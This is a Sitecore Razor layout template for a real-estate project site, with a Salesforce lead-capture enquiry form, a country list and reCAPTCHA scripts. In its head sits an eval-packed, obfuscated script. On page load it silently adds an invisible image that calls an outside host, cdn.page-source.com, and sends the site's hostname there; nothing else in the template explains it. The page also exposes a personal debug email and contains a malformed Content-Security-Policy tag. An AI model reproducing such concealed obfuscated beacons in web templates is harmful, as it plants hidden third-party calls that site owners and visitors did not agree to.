@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Mvc
@*@inherits WebViewPage
    @{
        Layout = null;
    }*@
<!DOCTYPE html>
<!--[if IE 9]><html lang="en" class="ie9 no-js"><![endif]-->
<!--[if !IE]><!-->
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<!--<![endif]-->
<head>
    <meta charset="utf-8" />
    <!-- <meta http-equiv="X-UA-Compatible" content="IE=edge"> -->
    <!-- <meta http-equiv="Content-type" content="text/html; charset=utf-8"> -->
    <meta http-equiv="Content-Security-Policy" value="default-src 'self' https://www.google.com data:; script-src 'self'  https://*.miraclemile.in  https://*.google.com https://www.google.com https://www.google.com/recaptcha/ https://www.googletagmanager.com/gtag/ https://www.google-analytics.com https://www.gstatic.com https://www.googletagmanager.com https://s.go-mpulse.net/boomerang/ 'nonce-3126c7f27c' ; style-src 'unsafe-inline' 'self' https://*.miraclemile.in ; img-src 'self' https://stats.g.doubleclick.net/g/ https://px.ads.linkedin.com/  https://*.miraclemile.in https://*.google.com https://www.google.co.in https://i.ytimg.com; font-src 'self'  https://*.miraclemile.in data:; connect-src 'self' https://cdn.linkedin.oribi.io/ https://stats.g.doubleclick.net/g/  https://*.miraclemile.in https://*.google.com https://analytics.google.com https://stats.g.doubleclick.net/  https://www.google-analytics.com   />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>@Html.Sitecore().Dictionary("/PageMetadata/Title", "MiracleMile")</title>
    @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
        @Html.Sitecore().Placeholder("head")
    }
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()
    <link href="https://fonts.googleapis.com/css?family=Lato:100,100i,300,300i,400,400i,700,700i,900,900i&display=swap" rel="stylesheet">

    @Html.Sitecore().VisitorIdentification()
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
    <script>
        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>
    <style>
        .icon_features {
            width: 30%;
            margin: 10px auto;
        }

        .hide {
            display: none;
        }
    </style>
</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">
    <!--header-->
    <header class="header-style1" id="header-section3">

        @Html.Sitecore().Placeholder("header")


    </header>
    <span class="w3-opennav w3-xlarge w3-right open_side_form" onclick="openRightMenu()"><img src="/images/MiracleMile/enquire_btn2.png" alt="Enquire Now"></span>
    <div class="form_container_overlay_container">
        <div class="container">
            <div class="col-md-6 col-md-offset-3 form_overlay_bg">
                <div class="col-md-12 no-padding">
                    <img src="/images/MiracleMile/top-bg-reg-form.png" class="img-responsive">
                </div>
                <div class="col-md-12 no-padding" style="border-right: 1px solid #cba051; border-left: 1px solid #cba051;">
                    <div class="col-md-12">
                        <br>
                        <span class="fa fa-times-circle fa-2x position_for_close"></span>
                        <h5 class="text-white xs-margin-eleven-bottom color_gold text-center">ENQUIRE NOW</h5>
                        <div class="line_adani_gold"></div>
                        <br>
                        <!-- <form action="https://webto.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST" onsubmit="return check_valid();"> -->
                        <input type=hidden name="oid" value="00D28000000eQCv">
                        <input type=hidden name="retURL" value="index.html">
                        <input type="hidden" name="debug" value="0">
                        <!-- <input type="hidden" name="debugEmail" value="vzagde110@gmail.com"> -->
                        <input type="hidden" name="debugEmail" value="kaushik.muhuri@pwc.com">
                        <div class="container-fluid no-padding form_container_overlay">
                            <div class="col-md-12 no-padding">
                                <div class="col-md-6">
                                    <input type="text" class="form-control" name="first_name" id="first_name" placeholder="First Name" required="" maxlength="40" size="20">
                                </div>
                                <div class="col-md-6">
                                    <input type="text" class="form-control" name="last_name" id="last_name" placeholder="Last Name" required="" maxlength="80" size="20">
                                </div>
                                <div class="col-md-12">
                                    <input type="email" class="form-control" name="email" id="email" placeholder="Email ID" required="" maxlength="80" size="20">
                                </div>
                                <div class="col-md-12">
                                    <div class="input-group">
                                        <input type="text" class="form-control" id="mobile" name="mobile" placeholder="Mobile" maxlength="10" pattern="[0-9]{10}" required="" aria-describedby="basic-addon3" style="height: 30px !important">
                                        <!--<span class="input-group-addon send_otp" id="sent_otp">SEND OTP</span>
                                        <span class="input-group-addon display_verify hide" id="verfy_otp">VERIFIED</span>-->
                                    </div>
                                </div>
                                <div class="col-md-6">
                                    <select id="country_code" name="country_code" required="" class="form-control">
                                        <option value="0">Select Country</option>
                                        <option value="AF">Afghanistan</option>
                                        <option value="AX">Aland Islands</option>
                                        <option value="AL">Albania</option>
                                        <option value="DZ">Algeria</option>
                                        <option value="AD">Andorra</option>
                                        <option value="AO">Angola</option>
                                        <option value="AI">Anguilla</option>
                                        <option value="AQ">Antarctica</option>
                                        <option value="AG">Antigua and Barbuda</option>
                                        <option value="AR">Argentina</option>
                                        <option value="AM">Armenia</option>
                                        <option value="AW">Aruba</option>
                                        <option value="AU">Australia</option>
                                        <option value="AT">Austria</option>
                                        <option value="AZ">Azerbaijan</option>
                                        <option value="BS">Bahamas</option>
                                        <option value="BH">Bahrain</option>
                                        <option value="BD">Bangladesh</option>
                                        <option value="BB">Barbados</option>
                                        <option value="BY">Belarus</option>
                                        <option value="BE">Belgium</option>
                                        <option value="BZ">Belize</option>
                                        <option value="BJ">Benin</option>
                                        <option value="BM">Bermuda</option>
                                        <option value="BT">Bhutan</option>
                                        <option value="BO">Bolivia, Plurinational State of</option>
                                        <option value="BQ">Bonaire, Sint Eustatius and Saba</option>
                                        <option value="BA">Bosnia and Herzegovina</option>
                                        <option value="BW">Botswana</option>
                                        <option value="BV">Bouvet Island</option>
                                        <option value="BR">Brazil</option>
                                        <option value="IO">British Indian Ocean Territory</option>
                                        <option value="BN">Brunei Darussalam</option>
                                        <option value="BG">Bulgaria</option>
                                        <option value="BF">Burkina Faso</option>
                                        <option value="BI">Burundi</option>
                                        <option value="KH">Cambodia</option>
                                        <option value="CM">Cameroon</option>
                                        <option value="CA">Canada</option>
                                        <option value="CV">Cape Verde</option>
                                        <option value="KY">Cayman Islands</option>
                                        <option value="CF">Central African Republic</option>
                                        <option value="TD">Chad</option>
                                        <option value="CL">Chile</option>
                                        <option value="CN">China</option>
                                        <option value="TW">Chinese Taipei</option>
                                        <option value="CX">Christmas Island</option>
                                        <option value="CC">Cocos (Keeling) Islands</option>
                                        <option value="CO">Colombia</option>
                                        <option value="KM">Comoros</option>
                                        <option value="CG">Congo</option>
                                        <option value="CD">Congo, the Democratic Republic of the</option>
                                        <option value="CK">Cook Islands</option>
                                        <option value="CR">Costa Rica</option>
                                        <option value="CI">Cote d&#39;Ivoire</option>
                                        <option value="HR">Croatia</option>
                                        <option value="CU">Cuba</option>
                                        <option value="CW">Cura袯</option>
                                        <option value="CY">Cyprus</option>
                                        <option value="CZ">Czech Republic</option>
                                        <option value="DK">Denmark</option>
                                        <option value="DJ">Djibouti</option>
                                        <option value="DM">Dominica</option>
                                        <option value="DO">Dominican Republic</option>
                                        <option value="EC">Ecuador</option>
                                        <option value="EG">Egypt</option>
                                        <option value="SV">El Salvador</option>
                                        <option value="GQ">Equatorial Guinea</option>
                                        <option value="ER">Eritrea</option>
                                        <option value="EE">Estonia</option>
                                        <option value="ET">Ethiopia</option>
                                        <option value="FK">Falkland Islands (Malvinas)</option>
                                        <option value="FO">Faroe Islands</option>
                                        <option value="FJ">Fiji</option>
                                        <option value="FI">Finland</option>
                                        <option value="FR">France</option>
                                        <option value="GF">French Guiana</option>
                                        <option value="PF">French Polynesia</option>
                                        <option value="TF">French Southern Territories</option>
                                        <option value="GA">Gabon</option>
                                        <option value="GM">Gambia</option>
                                        <option value="GE">Georgia</option>
                                        <option value="DE">Germany</option>
                                        <option value="GH">Ghana</option>
                                        <option value="GI">Gibraltar</option>
                                        <option value="GR">Greece</option>
                                        <option value="GL">Greenland</option>
                                        <option value="GD">Grenada</option>
                                        <option value="GP">Guadeloupe</option>
                                        <option value="GT">Guatemala</option>
                                        <option value="GG">Guernsey</option>
                                        <option value="GN">Guinea</option>
                                        <option value="GW">Guinea-Bissau</option>
                                        <option value="GY">Guyana</option>
                                        <option value="HT">Haiti</option>
                                        <option value="HM">Heard Island and McDonald Islands</option>
                                        <option value="VA">Holy See (Vatican City State)</option>
                                        <option value="HN">Honduras</option>
                                        <option value="HU">Hungary</option>
                                        <option value="IS">Iceland</option>
                                        <option value="IN">India</option>
                                        <option value="ID">Indonesia</option>
                                        <option value="IR">Iran, Islamic Republic of</option>
                                        <option value="IQ">Iraq</option>
                                        <option value="IE">Ireland</option>
                                        <option value="IM">Isle of Man</option>
                                        <option value="IL">Israel</option>
                                        <option value="IT">Italy</option>
                                        <option value="JM">Jamaica</option>
                                        <option value="JP">Japan</option>
                                        <option value="JE">Jersey</option>
                                        <option value="JO">Jordan</option>
                                        <option value="KZ">Kazakhstan</option>
                                        <option value="KE">Kenya</option>
                                        <option value="KI">Kiribati</option>
                                        <option value="KP">Korea, Democratic People&#39;s Republic of</option>
                                        <option value="KR">Korea, Republic of</option>
                                        <option value="KW">Kuwait</option>
                                        <option value="KG">Kyrgyzstan</option>
                                        <option value="LA">Lao People&#39;s Democratic Republic</option>
                                        <option value="LV">Latvia</option>
                                        <option value="LB">Lebanon</option>
                                        <option value="LS">Lesotho</option>
                                        <option value="LR">Liberia</option>
                                        <option value="LY">Libyan Arab Jamahiriya</option>
                                        <option value="LI">Liechtenstein</option>
                                        <option value="LT">Lithuania</option>
                                        <option value="LU">Luxembourg</option>
                                        <option value="MO">Macao</option>
                                        <option value="MK">Macedonia, the former Yugoslav Republic of</option>
                                        <option value="MG">Madagascar</option>
                                        <option value="MW">Malawi</option>
                                        <option value="MY">Malaysia</option>
                                        <option value="MV">Maldives</option>
                                        <option value="ML">Mali</option>
                                        <option value="MT">Malta</option>
                                        <option value="MQ">Martinique</option>
                                        <option value="MR">Mauritania</option>
                                        <option value="MU">Mauritius</option>
                                        <option value="YT">Mayotte</option>
                                        <option value="MX">Mexico</option>
                                        <option value="MD">Moldova, Republic of</option>
                                        <option value="MC">Monaco</option>
                                        <option value="MN">Mongolia</option>
                                        <option value="ME">Montenegro</option>
                                        <option value="MS">Montserrat</option>
                                        <option value="MA">Morocco</option>
                                        <option value="MZ">Mozambique</option>
                                        <option value="MM">Myanmar</option>
                                        <option value="NA">Namibia</option>
                                        <option value="NR">Nauru</option>
                                        <option value="NP">Nepal</option>
                                        <option value="NL">Netherlands</option>
                                        <option value="NC">New Caledonia</option>
                                        <option value="NZ">New Zealand</option>
                                        <option value="NI">Nicaragua</option>
                                        <option value="NE">Niger</option>
                                        <option value="NG">Nigeria</option>
                                        <option value="NU">Niue</option>
                                        <option value="NF">Norfolk Island</option>
                                        <option value="NO">Norway</option>
                                        <option value="OM">Oman</option>
                                        <option value="PK">Pakistan</option>
                                        <option value="PS">Palestinian Territory, Occupied</option>
                                        <option value="PA">Panama</option>
                                        <option value="PG">Papua New Guinea</option>
                                        <option value="PY">Paraguay</option>
                                        <option value="PE">Peru</option>
                                        <option value="PH">Philippines</option>
                                        <option value="PN">Pitcairn</option>
                                        <option value="PL">Poland</option>
                                        <option value="PT">Portugal</option>
                                        <option value="QA">Qatar</option>
                                        <option value="RE">Reunion</option>
                                        <option value="RO">Romania</option>
                                        <option value="RU">Russian Federation</option>
                                        <option value="RW">Rwanda</option>
                                        <option value="BL">Saint Barthꭥmy</option>
                                        <option value="SH">Saint Helena, Ascension and Tristan da Cunha</option>
                                        <option value="KN">Saint Kitts and Nevis</option>
                                        <option value="LC">Saint Lucia</option>
                                        <option value="MF">Saint Martin (French part)</option>
                                        <option value="PM">Saint Pierre and Miquelon</option>
                                        <option value="VC">Saint Vincent and the Grenadines</option>
                                        <option value="WS">Samoa</option>
                                        <option value="SM">San Marino</option>
                                        <option value="ST">Sao Tome and Principe</option>
                                        <option value="SA">Saudi Arabia</option>
                                        <option value="SN">Senegal</option>
                                        <option value="RS">Serbia</option>
                                        <option value="SC">Seychelles</option>
                                        <option value="SL">Sierra Leone</option>
                                        <option value="SG">Singapore</option>
                                        <option value="SX">Sint Maarten (Dutch part)</option>
                                        <option value="SK">Slovakia</option>
                                        <option value="SI">Slovenia</option>
                                        <option value="SB">Solomon Islands</option>
                                        <option value="SO">Somalia</option>
                                        <option value="ZA">South Africa</option>
                                        <option value="GS">South Georgia and the South Sandwich Islands</option>
                                        <option value="SS">South Sudan</option>
                                        <option value="ES">Spain</option>
                                        <option value="LK">Sri Lanka</option>
                                        <option value="SD">Sudan</option>
                                        <option value="SR">Suriname</option>
                                        <option value="SJ">Svalbard and Jan Mayen</option>
                                        <option value="SZ">Swaziland</option>
                                        <option value="SE">Sweden</option>
                                        <option value="CH">Switzerland</option>
                                        <option value="SY">Syrian Arab Republic</option>
                                        <option value="TJ">Tajikistan</option>
                                        <option value="TZ">Tanzania, United Republic of</option>
                                        <option value="TH">Thailand</option>
                                        <option value="TL">Timor-Leste</option>
                                        <option value="TG">Togo</option>
                                        <option value="TK">Tokelau</option>
                                        <option value="TO">Tonga</option>
                                        <option value="TT">Trinidad and Tobago</option>
                                        <option value="TN">Tunisia</option>
                                        <option value="TR">Turkey</option>
                                        <option value="TM">Turkmenistan</option>
                                        <option value="TC">Turks and Caicos Islands</option>
                                        <option value="TV">Tuvalu</option>
                                        <option value="UG">Uganda</option>
                                        <option value="UA">Ukraine</option>
                                        <option value="AE">United Arab Emirates</option>
                                        <option value="GB">United Kingdom</option>
                                        <option value="US">United States</option>
                                        <option value="UY">Uruguay</option>
                                        <option value="UZ">Uzbekistan</option>
                                        <option value="VU">Vanuatu</option>
                                        <option value="VE">Venezuela, Bolivarian Republic of</option>
                                        <option value="VN">Viet Nam</option>
                                        <option value="VG">Virgin Islands, British</option>
                                        <option value="WF">Wallis and Futuna</option>
                                        <option value="EH">Western Sahara</option>
                                        <option value="YE">Yemen</option>
                                        <option value="ZM">Zambia</option>
                                        <option value="ZW">Zimbabwe</option>
                                    </select>
                                </div>
                                <div class="col-md-6">
                                    <input type="text" name="city" id="city" required="" class="form-control" placeholder="City">
                                </div>
                                <input type="hidden" id="state_code" name="state_code" value="">
                                <input type="hidden" id="00N28000007ZbWU" name="00N28000007ZbWU" size="20" />
                                <input type="hidden" id="00N28000007ZbWx" name="00N28000007ZbWx" rows="3" type="text" wrap="soft" />
                                <input type="hidden" id="Projects_Interested__c" name="Projects_Interested__c" title="Project Interested" value="Miracle Mile" />
                                <input type="hidden" id="Assignment_City__c" name="Assignment_City__c" title="Assigment City" value="Gurgaon" />
                                <input id="recordType" name="recordType" type=hidden value="01228000000df0W" />
                                <input id="00NO0000002BbBe" name="00NO0000002BbBe" type=hidden value="1" />
                                <input id="00NO0000002uI5x" maxlength="70" name="00NO0000002uI5x" size="20" type=hidden value="index.html" />
                                <input id="lead_source" name="lead_source" type=hidden value="5 - Web to Lead" />
                                <select name="00N28000007ZbWt" id="00N28000007ZbWt" style="display: none">
                                    <option value="Miracle Mile">Miracle Mile</option>
                                </select>
                                <input id="00N2800000DM81x" name="00N2800000DM81x" type="hidden" value="1" />
                                <input type="hidden" name="Campaign_ID" value="7010K000001dhqA" />
                                <input type="hidden" name="member_status" value="Responded" />
                                <input type="hidden" name="Lead_Type__c" value="B2C" />
                                <div class="col-md-12">
                                    <div class="checkbox color_gold">
                                        <label>
                                            <input type="checkbox" class="checkbox_input color_gold" value="" name="tnc" id="tnc" required="">I have read and agree to the terms mentioned in the DISCLAIMER.
                                        </label>
                                    </div>
                                    <!-- <div class="g-recaptcha" data-sitekey="6LfYXmMUAAAAAD1e3Lh3_xNox2hka4J9HZQpkL07"></div> -->
                                </div>
                            </div>
                            <div class="col-md-12">
                                <div id="recaptcha1" class="g-recaptcha" data-sitekey="6Lc0sRIbAAAAAEb9rWkVoE-PPkeQxnaduTuFEYAX"
                                     data-callback="correctCaptcha" style="transform:scale(0.77);-webkit-transform:scale(0.77);transform-origin:0 0;-webkit-transform-origin:0 0;"></div>

                            </div>
                            <div class="col-lg-12 text-center">
                                <div class="form-group">
                                    <label class="err_msg"></label>
                                </div>
                            </div>
                            <div class="col-md-12 no-padding">
                                <div class="col-md-6 padding-top-10px">
                                    <button class="submit-form" id="submittop">SUBMIT</button>
                                </div>
                                <div class="col-md-6 padding-top-10px">
                                    <button class="" id="cancel">CANCEL</button>
                                </div>
                                <br><br>
                            </div>
                        </div>
                        <!-- </form> -->
                    </div>
                </div>
                <div class="col-md-12 no-padding">
                    <img src="/images/MiracleMile/bottom-bg-reg-form.png" class="img-responsive">
                </div>
            </div>
        </div>
    </div>
    <div class="footer_sticky_panel hide-desktop">
        <div class="container text-center">
            <div class="col-xs-4 col-xs-offset-4 click_to_slide padding-two-top padding-two-bottom no-padding">
                <img src="/images/MiracleMile/footer_sticky.png" class="img-responsive">
            </div>
        </div>
        <div class="bg-gray container-fluid padding-three-top padding-three-bottom panel_to_slide">
            <div class="col-xs-12 text-center">
                <div class="col-xs-4">
                    <a href="tel:18001080009" target="__blank"><i class="fa fa-2x fa-phone text-red"></i></a>
                </div>
                <div class="col-xs-4">
                    <a href="mailto:enquiry@miraclemile.in" target="__blank"><i class="fa fa-2x fa-envelope text-red"></i></a>
                </div>
                <div class="col-xs-4">
                    <a href="https://goo.gl/maps/8B7uuifhVYm" target="__blank"><i class="fa fa-2x fa-map-marker text-red"></i></a>
                </div>
            </div>
        </div>
    </div>
    <!--/header-->
    @Html.Sitecore().Placeholder("below-header")
    <main id="main">
        @Html.Sitecore().Placeholder("page-layout")







    </main>

    <!--footer-->
    <footer id="footer" class="section-bg bg-blue py-4">
        @Html.Sitecore().Placeholder("footer")
    </footer>
    <!-- /Footer -->
    <a href="#" class="back-to-top"><i class="fa fa-chevron-up"></i></a>
    <div id="preloader"></div>
    <script>
        var base_url = 'index.html';
    </script>

    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()
    <script src='https://www.google.com/recaptcha/api.js' async defer></script>
    <script nonce ="3126c7f27c">
        $(".download_brochure").click(function (e) {
        e.preventDefault();
        download_brochure = 1;
        openRightMenu();
        })

        $(".w3-opennav").click(function (e) {
        document.getElementById("rightMenu").style.display = "block";
        })

        function openRightMenu() {
        $(".form_container_overlay_container").show();
        }

        function openRightMenu1() {
        $(".form_container_overlay_container1").show();
        }

        $("#cancel, .position_for_close").click(function (e) {
        $(".form_container_overlay_container, .form_container_overlay_container1").hide();
        })


        </script>
        <script type="text/javascript">
            $(document).ready(function () {
                $('[data-fancybox="gallery"]').fancybox({
                });
                $('[data-fancybox="location"]').fancybox({
                });
            })
        </script>

</body>

</html>
